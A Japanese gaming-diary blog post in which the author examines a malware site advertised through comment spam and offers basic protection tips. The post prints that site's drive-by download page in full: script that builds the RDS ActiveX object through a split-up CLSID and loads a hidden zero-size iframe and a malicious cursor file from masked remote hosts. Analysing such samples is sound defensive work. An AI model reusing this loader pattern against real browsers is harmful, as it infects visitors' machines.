FC2ブログ
恩姫のリネージュ日記
このページはリネージュのベガで活動している恩姫の日記サイトです。
DATE: --/--/--(--)   CATEGORY: スポンサー広告
スポンサーサイト
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。
page top
しばらく放置していたら
コメントウイルスサイトの誘導カキコばっかりですね…。
暇なのでウイルスサイトのソース見てみました。
最近、IT系の仕事しているせいか、こんなものの知識ばかり増えて困りますhhh

ちなみにカキコしていたのはこんなホスト名の方々(; ̄ー ̄)
58.22.228.221
OFSfb-23p4-3.ppp11.odn.ad.jp
OFSfb-23p2-171.ppp11.odn.ad.jp

さて、URLにジャンプすると何も表示されない画面が。
ソースを見てみるとこんな内容

<html><head>

<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">IE
<script language="javascript">
window.status="";
try{
var downf = document.createElement("object");
downf.setAttribute("classid", "clsid:BD9"+"6C556-6"+"5A3-11D"+"0-983A-00C"+"04FC2"+"9E36");
str="Microsoft.XMLHTTP";
var O = downf.CreateObject(str,"");
document.write("<iframe width=0 height=0 src=http://*****************/test.htm></iframe>");
}
catch(e)
{
document.write("<DIV style=\"CURSOR: url('http://********************/test.cur')\"></DIV>");
};
</script><div style=""></div>
</body></html>

JavaScript文でRDS使う為の宣言やってる?
Ajaxでよく使われてるヤツですよね。何かバグあったかしら…。
iframeで表示しようとしているページの中身は文字コードのバグが起きるヤツっぽい。多分、UTF7コードのバグを誘発しようとしてるのだと思います。調べてないので違うかも^^
catch文は例外発生時に起こすアクション。
RDSでVBプログラム実行に失敗した時、他の方法で感染させようとしてるって感じ?
curファイルもウイルスですた。
バグ使って感染させるみたいです。

んで、この先は対処法
JavaScriptを無効にする。
SKTC4F

閣下報告

閣下ドロップ

ギランUB

多分、上の絵の通りにいじっておけば大丈夫・・・なはず・・・。

あと私、IEの設定はトンと疎いので、もし、不足してたら誰か書き込みしてくれると嬉しいなぁ…。

でも、上の設定やると普通のサイトでJavaScript使っていたりするのでレイアウトがすっごいズレたりして見難いです。


お手軽なのは、CDから起動できるLinux。
やり方は聞かれれば(答えれる範囲で)答えます。
KNOPPIXとかPUPPYとかFedora7とか!

最近仕事でLinuxを使う事が多いです。

なかなか便利です!ぶっちゃけWindowsXPがゲームで遊ぶ為のOSに成り下がっている今日この頃…。

すごい、適当な日記(記事)でスイマセン!
スポンサーサイト
[ TB*0 | CO*0 ] page top

COMMENT

 管理者にだけ表示を許可する

TRACK BACK
TB*URL
Copyright © 恩姫のリネージュ日記. all rights reserved. ページの先頭へ
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。